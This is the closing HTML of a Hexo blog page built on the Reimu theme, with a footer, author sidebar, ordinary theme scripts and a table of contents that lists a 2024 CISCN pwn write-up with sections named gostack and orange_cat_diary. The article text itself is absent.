  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div class="outer">
    <div id="footer-info">
      
      <div>
        <span class="icon-copyright"></span>
        2022-2024
        <span class="footer-info-sep"></span>
        *月遇丛雲花遇風*
      </div>
      
        <div>
          基于&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
          Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
        </div>
      
      
        <div>
          <span class="icon-brush"></span>
          104.7k
          &nbsp;|&nbsp;
          <span class="icon-coffee"></span>
          07:58
        </div>
      
      
        <div>
          <span class="icon-eye"></span>
          <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
          &nbsp;|&nbsp;
          <span class="icon-user"></span>
          <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
        </div>
      
    </div>
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2024ciscn-pwn-%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text"> 2024ciscn pwn 复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#gostack"><span class="toc-number">1.1.</span> <span class="toc-text"> gostack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#orange_cat_diary"><span class="toc-number">1.2.</span> <span class="toc-text"> orange_cat_diary</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="*月遇丛雲花遇風*" class="lazyload">
  <div class="sidebar-author-name">*月遇丛雲花遇風*</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">26</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">16</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">26</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-email sidebar-social-icon">
      <a href=1027600674@qq.com itemprop="url" target="_blank" aria-label="email"></a>
    </div>
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/t3uk1 itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    <div class="site-search">
      <div class="reimu-popup popup">
        <div class="reimu-search">
          <div class="reimu-search-input-icon"></div>
          <div class="reimu-search-input" id="reimu-search-input"></div>
          <div class="popup-btn-close"></div>
        </div>
        <div class="reimu-results">
          <div id="reimu-stats"></div>
          <div id="reimu-hits"></div>
          <div id="reimu-pagination" class="reimu-pagination"></div>
        </div>
      </div>
    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>












  
<script src="/js/generator_search.js"></script>






  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>







  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    quicklink.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.2.4' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --></body>
  </html>

